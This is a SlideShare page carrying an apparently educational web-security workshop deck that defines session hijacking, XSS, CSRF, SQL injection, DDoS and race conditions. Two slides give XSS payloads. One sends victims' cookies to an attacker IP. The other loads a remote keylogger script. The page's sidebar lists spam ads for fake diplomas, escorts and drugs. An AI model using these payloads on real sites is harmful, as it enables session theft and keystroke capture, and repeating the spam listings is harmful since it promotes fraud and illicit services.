SlideShare uma empresa Scribd logo
1 de 30
Workshop
Web Security application
DAOULAT KHALIL
github.com/Vvoox
fb.com/daoulat.khalil
Session Hijacking
TCP session hijacking is a security attack on a user
session over a protected network. The most
common method of session hijacking is called IP
spoofing, when an attacker uses source-routed IP
packets to insert commands into an active
communication between two nodes on a network
and disguising itself as one of the authenticated
users. This type of attack is possible because
authentication typically is only done at the start
of a TCP session.
The HJ Attack:
Send to the victim : http://site.com//?name=<script>new
Image().src="http://192.168.149.128/bogus.php?output="+document.cookie;</script>
XSS Cross Site Scripting
Cross-site scripting (XSS) is a type of computer
security vulnerability typically found in web
applications. XSS enables attackers to inject
client-side scripts into web pages viewed by
other users.
XSS : Persistent (or stored)
The persistent (or stored) XSS vulnerability is
a more devastating variant of a cross-site
scripting flaw: it occurs when the data
provided by the attacker is saved by the
server, and then permanently displayed on
"normal" pages returned to other users in
the course of regular browsing, without
proper HTML escaping. A classic example of
this is with online message boards where
users are allowed to post HTML formatted
messages for other users to read
XSS : Non-persistent (reflected)
Reflected Cross-site Scripting (XSS) occur when an
attacker injects browser executable code within a single
HTTP response. The injected attack is not stored within
the application itself; it is non-persistent and only
impacts users who open a maliciously crafted link or
third-party web page. The attack string is included as
part of the crafted URI or HTTP parameters, improperly
processed by the application, and returned to the victim.
XSS : Capture the keystrokes by injecting a keylogger
In this attack scenario, we will inject a JavaScript keylogger into
the vulnerable web page and we will capture all the keystrokes
of the user within the current page.
http://Site.com/crisis/?name=<script src="http://My_IP/Crisis.js"></script>
XSS : Keylogger
XSS : Keylogger
CSRF
Cross-site request forgery (also known as
CSRF) is a web security vulnerability that
allows an attacker to induce users to
perform actions that they do not intend
to perform. It allows an attacker to partly
circumvent the same origin policy, which
is designed to prevent different websites
from interfering with each other.
SQL Injection
SQL Injection
SQL Injection
Type 1 : Error-based SQLi
the attacker performs actions that cause the database to produce error messages. The
attacker can potentially use the data provided by these error messages to gather
information about the structure of the database.
Type 2 : Union-based SQLi
this technique takes advantage of the UNION SQL operator, which fuses multiple select statements
generated by the database to get a single HTTP response. This response may contain data that can
be leveraged by the attacker.
SQL Injection
DDOS ATTACK
DDos Attack
a denial-of-service attack (DoS attack) is a cyber-attack in which the perpetrator seeks to make a machine or network
resource unavailable to its intended users by temporarily or indefinitely disrupting services of a host connected to
the Internet.
Ddos Attack
DDos Attack
Race Condition
A race condition or race hazard is the condition of an
electronics, software, or other system where the system's
substantive behavior is dependent on the sequence or timing
of other uncontrollable events. It becomes a bug when one or
more of the possible behaviors is undesirable.
Race Condition
THE End
Any Questions?

Mais conteúdo relacionado

Semelhante a Web-Security-Application.pptx

Semelhante a Web-Security-Application.pptx (20)

Methods Hackers Use
Methods Hackers UseMethods Hackers Use
Methods Hackers Use
 
Xss attack
Xss attackXss attack
Xss attack
 
Prevention of Cross-Site Scripting using Hash Technique
Prevention of Cross-Site Scripting using Hash TechniquePrevention of Cross-Site Scripting using Hash Technique
Prevention of Cross-Site Scripting using Hash Technique
 
Cross site scripting
Cross site scripting Cross site scripting
Cross site scripting
 
Ch03 Protecting Systems
Ch03 Protecting SystemsCh03 Protecting Systems
Ch03 Protecting Systems
 
Web Vulnerabilities And Exploitation - Compromising The Web
Web Vulnerabilities And Exploitation - Compromising The WebWeb Vulnerabilities And Exploitation - Compromising The Web
Web Vulnerabilities And Exploitation - Compromising The Web
 
Cross Site Scripting (XSS)
Cross Site Scripting (XSS)Cross Site Scripting (XSS)
Cross Site Scripting (XSS)
 
Ceh v5 module 12 web application vulnerabilities
Ceh v5 module 12 web application vulnerabilitiesCeh v5 module 12 web application vulnerabilities
Ceh v5 module 12 web application vulnerabilities
 
Cross site scripting (xss)
Cross site scripting (xss)Cross site scripting (xss)
Cross site scripting (xss)
 
Introduction of exploit on window XP & Trick
Introduction of exploit on window XP & Trick Introduction of exploit on window XP & Trick
Introduction of exploit on window XP & Trick
 
React security vulnerabilities
React security vulnerabilitiesReact security vulnerabilities
React security vulnerabilities
 
Web security landscape Unit 3 part 2
Web security landscape Unit 3 part 2Web security landscape Unit 3 part 2
Web security landscape Unit 3 part 2
 
44641917 091011
44641917 09101144641917 091011
44641917 091011
 
Session7-XSS & CSRF
Session7-XSS & CSRFSession7-XSS & CSRF
Session7-XSS & CSRF
 
HallTumserFinalPaper
HallTumserFinalPaperHallTumserFinalPaper
HallTumserFinalPaper
 
Cross Site Scripting
Cross Site ScriptingCross Site Scripting
Cross Site Scripting
 
Xss frame work
Xss frame workXss frame work
Xss frame work
 
SeanRobertsThesis
SeanRobertsThesisSeanRobertsThesis
SeanRobertsThesis
 
Seminar2015Bilic_Nicole
Seminar2015Bilic_NicoleSeminar2015Bilic_Nicole
Seminar2015Bilic_Nicole
 
Cyber security
Cyber securityCyber security
Cyber security
 

Último

一比一原版(UEA毕业证书)东英吉利亚大学毕业证如何办理
一比一原版(UEA毕业证书)东英吉利亚大学毕业证如何办理一比一原版(UEA毕业证书)东英吉利亚大学毕业证如何办理
一比一原版(UEA毕业证书)东英吉利亚大学毕业证如何办理ss
 
How to order fake Worcester State University diploma?
How to order fake Worcester State University diploma?How to order fake Worcester State University diploma?
How to order fake Worcester State University diploma?melodolykelton
 
Van Gogh Powerpoint for art lesson today
Van Gogh Powerpoint for art lesson todayVan Gogh Powerpoint for art lesson today
Van Gogh Powerpoint for art lesson todaylucygibson17
 
Jaro je tady - Spring is here (Judith) 2
Jaro je tady - Spring is here (Judith) 2Jaro je tady - Spring is here (Judith) 2
Jaro je tady - Spring is here (Judith) 2wistariecz
 
Azamgarh Call Girls WhatsApp Chat: 📞 8617370543 (24x7 ) Service Available Nea...
Azamgarh Call Girls WhatsApp Chat: 📞 8617370543 (24x7 ) Service Available Nea...Azamgarh Call Girls WhatsApp Chat: 📞 8617370543 (24x7 ) Service Available Nea...
Azamgarh Call Girls WhatsApp Chat: 📞 8617370543 (24x7 ) Service Available Nea...Nitya salvi
 
LESSON-1-MUSIC-Q4 also a reviewer mapeh.pptx
LESSON-1-MUSIC-Q4 also a reviewer mapeh.pptxLESSON-1-MUSIC-Q4 also a reviewer mapeh.pptx
LESSON-1-MUSIC-Q4 also a reviewer mapeh.pptxmatthewmirafuentes
 
WhatsApp-(# 9711106444 #)Call Girl in Noida Sector 80 Noida (Escorts) Delhi
WhatsApp-(# 9711106444 #)Call Girl in Noida Sector 80 Noida (Escorts) DelhiWhatsApp-(# 9711106444 #)Call Girl in Noida Sector 80 Noida (Escorts) Delhi
WhatsApp-(# 9711106444 #)Call Girl in Noida Sector 80 Noida (Escorts) Delhidelhimunirka15
 
Call Girls Varanasi Just Call 8617370543Top Class Call Girl Service Available
Call Girls Varanasi Just Call 8617370543Top Class Call Girl Service AvailableCall Girls Varanasi Just Call 8617370543Top Class Call Girl Service Available
Call Girls Varanasi Just Call 8617370543Top Class Call Girl Service AvailableNitya salvi
 
一比一原版(YU学位证书)约克大学毕业证学历认证新版办理
一比一原版(YU学位证书)约克大学毕业证学历认证新版办理一比一原版(YU学位证书)约克大学毕业证学历认证新版办理
一比一原版(YU学位证书)约克大学毕业证学历认证新版办理txkonu
 
Ignite Your Brand: Tailored Creative Solutions Proposal
Ignite Your Brand: Tailored Creative Solutions ProposalIgnite Your Brand: Tailored Creative Solutions Proposal
Ignite Your Brand: Tailored Creative Solutions ProposalCreative Labs
 
如何办理澳洲迪肯大学毕业证(Deakin毕业证书)毕业证成绩单原版一比一
如何办理澳洲迪肯大学毕业证(Deakin毕业证书)毕业证成绩单原版一比一如何办理澳洲迪肯大学毕业证(Deakin毕业证书)毕业证成绩单原版一比一
如何办理澳洲迪肯大学毕业证(Deakin毕业证书)毕业证成绩单原版一比一avy6anjnd
 
SB_ Scott Pilgrim_ Rough_ RiverPhan (2024)
SB_ Scott Pilgrim_ Rough_ RiverPhan (2024)SB_ Scott Pilgrim_ Rough_ RiverPhan (2024)
SB_ Scott Pilgrim_ Rough_ RiverPhan (2024)River / Thao Phan
 
Top Rated Lucknow Escorts Service, ₹5000 Best Hot Call Girls With Room +91-82...
Top Rated Lucknow Escorts Service, ₹5000 Best Hot Call Girls With Room +91-82...Top Rated Lucknow Escorts Service, ₹5000 Best Hot Call Girls With Room +91-82...
Top Rated Lucknow Escorts Service, ₹5000 Best Hot Call Girls With Room +91-82...meghakumariji156
 
Call Girls Sultanpur Just Call 📞 8617370543 Top Class Call Girl Service Avail...
Call Girls Sultanpur Just Call 📞 8617370543 Top Class Call Girl Service Avail...Call Girls Sultanpur Just Call 📞 8617370543 Top Class Call Girl Service Avail...
Call Girls Sultanpur Just Call 📞 8617370543 Top Class Call Girl Service Avail...Nitya salvi
 
Call Girls Aligarh Just Call 8617370543 Top Class Call Girl Service Available
Call Girls Aligarh Just Call 8617370543 Top Class Call Girl Service AvailableCall Girls Aligarh Just Call 8617370543 Top Class Call Girl Service Available
Call Girls Aligarh Just Call 8617370543 Top Class Call Girl Service AvailableNitya salvi
 
Russian Call Girls Pilibhit Just Call 👉👉 📞 8617370543 Top Class Call Girl Ser...
Russian Call Girls Pilibhit Just Call 👉👉 📞 8617370543 Top Class Call Girl Ser...Russian Call Girls Pilibhit Just Call 👉👉 📞 8617370543 Top Class Call Girl Ser...
Russian Call Girls Pilibhit Just Call 👉👉 📞 8617370543 Top Class Call Girl Ser...Nitya salvi
 
Digital C-Type Printing: Revolutionizing The Future Of Photographic Prints
Digital C-Type Printing: Revolutionizing The Future Of Photographic PrintsDigital C-Type Printing: Revolutionizing The Future Of Photographic Prints
Digital C-Type Printing: Revolutionizing The Future Of Photographic PrintsMatte Image
 
sources of Hindu law kdaenflkjwwfererger
sources of Hindu law kdaenflkjwwferergersources of Hindu law kdaenflkjwwfererger
sources of Hindu law kdaenflkjwwferergerLakshayTewatia4
 
+97470301568>> buy weed, thc oil,cbd oil, kush, hash in Doha qatar}}
+97470301568>> buy weed, thc oil,cbd oil, kush, hash in Doha qatar}}+97470301568>> buy weed, thc oil,cbd oil, kush, hash in Doha qatar}}
+97470301568>> buy weed, thc oil,cbd oil, kush, hash in Doha qatar}}Health
 
ppt seni budaya kelas xi, menganalisis konsep,unsur,prinsip dan teknik
ppt seni budaya kelas xi, menganalisis konsep,unsur,prinsip dan teknikppt seni budaya kelas xi, menganalisis konsep,unsur,prinsip dan teknik
ppt seni budaya kelas xi, menganalisis konsep,unsur,prinsip dan teknikAgustinus791932
 

Último (20)

一比一原版(UEA毕业证书)东英吉利亚大学毕业证如何办理
一比一原版(UEA毕业证书)东英吉利亚大学毕业证如何办理一比一原版(UEA毕业证书)东英吉利亚大学毕业证如何办理
一比一原版(UEA毕业证书)东英吉利亚大学毕业证如何办理
 
How to order fake Worcester State University diploma?
How to order fake Worcester State University diploma?How to order fake Worcester State University diploma?
How to order fake Worcester State University diploma?
 
Van Gogh Powerpoint for art lesson today
Van Gogh Powerpoint for art lesson todayVan Gogh Powerpoint for art lesson today
Van Gogh Powerpoint for art lesson today
 
Jaro je tady - Spring is here (Judith) 2
Jaro je tady - Spring is here (Judith) 2Jaro je tady - Spring is here (Judith) 2
Jaro je tady - Spring is here (Judith) 2
 
Azamgarh Call Girls WhatsApp Chat: 📞 8617370543 (24x7 ) Service Available Nea...
Azamgarh Call Girls WhatsApp Chat: 📞 8617370543 (24x7 ) Service Available Nea...Azamgarh Call Girls WhatsApp Chat: 📞 8617370543 (24x7 ) Service Available Nea...
Azamgarh Call Girls WhatsApp Chat: 📞 8617370543 (24x7 ) Service Available Nea...
 
LESSON-1-MUSIC-Q4 also a reviewer mapeh.pptx
LESSON-1-MUSIC-Q4 also a reviewer mapeh.pptxLESSON-1-MUSIC-Q4 also a reviewer mapeh.pptx
LESSON-1-MUSIC-Q4 also a reviewer mapeh.pptx
 
WhatsApp-(# 9711106444 #)Call Girl in Noida Sector 80 Noida (Escorts) Delhi
WhatsApp-(# 9711106444 #)Call Girl in Noida Sector 80 Noida (Escorts) DelhiWhatsApp-(# 9711106444 #)Call Girl in Noida Sector 80 Noida (Escorts) Delhi
WhatsApp-(# 9711106444 #)Call Girl in Noida Sector 80 Noida (Escorts) Delhi
 
Call Girls Varanasi Just Call 8617370543Top Class Call Girl Service Available
Call Girls Varanasi Just Call 8617370543Top Class Call Girl Service AvailableCall Girls Varanasi Just Call 8617370543Top Class Call Girl Service Available
Call Girls Varanasi Just Call 8617370543Top Class Call Girl Service Available
 
一比一原版(YU学位证书)约克大学毕业证学历认证新版办理
一比一原版(YU学位证书)约克大学毕业证学历认证新版办理一比一原版(YU学位证书)约克大学毕业证学历认证新版办理
一比一原版(YU学位证书)约克大学毕业证学历认证新版办理
 
Ignite Your Brand: Tailored Creative Solutions Proposal
Ignite Your Brand: Tailored Creative Solutions ProposalIgnite Your Brand: Tailored Creative Solutions Proposal
Ignite Your Brand: Tailored Creative Solutions Proposal
 
如何办理澳洲迪肯大学毕业证(Deakin毕业证书)毕业证成绩单原版一比一
如何办理澳洲迪肯大学毕业证(Deakin毕业证书)毕业证成绩单原版一比一如何办理澳洲迪肯大学毕业证(Deakin毕业证书)毕业证成绩单原版一比一
如何办理澳洲迪肯大学毕业证(Deakin毕业证书)毕业证成绩单原版一比一
 
SB_ Scott Pilgrim_ Rough_ RiverPhan (2024)
SB_ Scott Pilgrim_ Rough_ RiverPhan (2024)SB_ Scott Pilgrim_ Rough_ RiverPhan (2024)
SB_ Scott Pilgrim_ Rough_ RiverPhan (2024)
 
Top Rated Lucknow Escorts Service, ₹5000 Best Hot Call Girls With Room +91-82...
Top Rated Lucknow Escorts Service, ₹5000 Best Hot Call Girls With Room +91-82...Top Rated Lucknow Escorts Service, ₹5000 Best Hot Call Girls With Room +91-82...
Top Rated Lucknow Escorts Service, ₹5000 Best Hot Call Girls With Room +91-82...
 
Call Girls Sultanpur Just Call 📞 8617370543 Top Class Call Girl Service Avail...
Call Girls Sultanpur Just Call 📞 8617370543 Top Class Call Girl Service Avail...Call Girls Sultanpur Just Call 📞 8617370543 Top Class Call Girl Service Avail...
Call Girls Sultanpur Just Call 📞 8617370543 Top Class Call Girl Service Avail...
 
Call Girls Aligarh Just Call 8617370543 Top Class Call Girl Service Available
Call Girls Aligarh Just Call 8617370543 Top Class Call Girl Service AvailableCall Girls Aligarh Just Call 8617370543 Top Class Call Girl Service Available
Call Girls Aligarh Just Call 8617370543 Top Class Call Girl Service Available
 
Russian Call Girls Pilibhit Just Call 👉👉 📞 8617370543 Top Class Call Girl Ser...
Russian Call Girls Pilibhit Just Call 👉👉 📞 8617370543 Top Class Call Girl Ser...Russian Call Girls Pilibhit Just Call 👉👉 📞 8617370543 Top Class Call Girl Ser...
Russian Call Girls Pilibhit Just Call 👉👉 📞 8617370543 Top Class Call Girl Ser...
 
Digital C-Type Printing: Revolutionizing The Future Of Photographic Prints
Digital C-Type Printing: Revolutionizing The Future Of Photographic PrintsDigital C-Type Printing: Revolutionizing The Future Of Photographic Prints
Digital C-Type Printing: Revolutionizing The Future Of Photographic Prints
 
sources of Hindu law kdaenflkjwwfererger
sources of Hindu law kdaenflkjwwferergersources of Hindu law kdaenflkjwwfererger
sources of Hindu law kdaenflkjwwfererger
 
+97470301568>> buy weed, thc oil,cbd oil, kush, hash in Doha qatar}}
+97470301568>> buy weed, thc oil,cbd oil, kush, hash in Doha qatar}}+97470301568>> buy weed, thc oil,cbd oil, kush, hash in Doha qatar}}
+97470301568>> buy weed, thc oil,cbd oil, kush, hash in Doha qatar}}
 
ppt seni budaya kelas xi, menganalisis konsep,unsur,prinsip dan teknik
ppt seni budaya kelas xi, menganalisis konsep,unsur,prinsip dan teknikppt seni budaya kelas xi, menganalisis konsep,unsur,prinsip dan teknik
ppt seni budaya kelas xi, menganalisis konsep,unsur,prinsip dan teknik
 

Web-Security-Application.pptx

  • 3.
  • 4.
  • 5.
  • 6. Session Hijacking TCP session hijacking is a security attack on a user session over a protected network. The most common method of session hijacking is called IP spoofing, when an attacker uses source-routed IP packets to insert commands into an active communication between two nodes on a network and disguising itself as one of the authenticated users. This type of attack is possible because authentication typically is only done at the start of a TCP session.
  • 7. The HJ Attack: Send to the victim : http://site.com//?name=<script>new Image().src="http://192.168.149.128/bogus.php?output="+document.cookie;</script>
  • 8. XSS Cross Site Scripting Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications. XSS enables attackers to inject client-side scripts into web pages viewed by other users.
  • 9. XSS : Persistent (or stored) The persistent (or stored) XSS vulnerability is a more devastating variant of a cross-site scripting flaw: it occurs when the data provided by the attacker is saved by the server, and then permanently displayed on "normal" pages returned to other users in the course of regular browsing, without proper HTML escaping. A classic example of this is with online message boards where users are allowed to post HTML formatted messages for other users to read
  • 10. XSS : Non-persistent (reflected) Reflected Cross-site Scripting (XSS) occur when an attacker injects browser executable code within a single HTTP response. The injected attack is not stored within the application itself; it is non-persistent and only impacts users who open a maliciously crafted link or third-party web page. The attack string is included as part of the crafted URI or HTTP parameters, improperly processed by the application, and returned to the victim.
  • 11. XSS : Capture the keystrokes by injecting a keylogger In this attack scenario, we will inject a JavaScript keylogger into the vulnerable web page and we will capture all the keystrokes of the user within the current page. http://Site.com/crisis/?name=<script src="http://My_IP/Crisis.js"></script>
  • 14.
  • 15. CSRF Cross-site request forgery (also known as CSRF) is a web security vulnerability that allows an attacker to induce users to perform actions that they do not intend to perform. It allows an attacker to partly circumvent the same origin policy, which is designed to prevent different websites from interfering with each other.
  • 16.
  • 17.
  • 21. Type 1 : Error-based SQLi the attacker performs actions that cause the database to produce error messages. The attacker can potentially use the data provided by these error messages to gather information about the structure of the database.
  • 22. Type 2 : Union-based SQLi this technique takes advantage of the UNION SQL operator, which fuses multiple select statements generated by the database to get a single HTTP response. This response may contain data that can be leveraged by the attacker.
  • 25. DDos Attack a denial-of-service attack (DoS attack) is a cyber-attack in which the perpetrator seeks to make a machine or network resource unavailable to its intended users by temporarily or indefinitely disrupting services of a host connected to the Internet.
  • 28. Race Condition A race condition or race hazard is the condition of an electronics, software, or other system where the system's substantive behavior is dependent on the sequence or timing of other uncontrollable events. It becomes a bug when one or more of the possible behaviors is undesirable.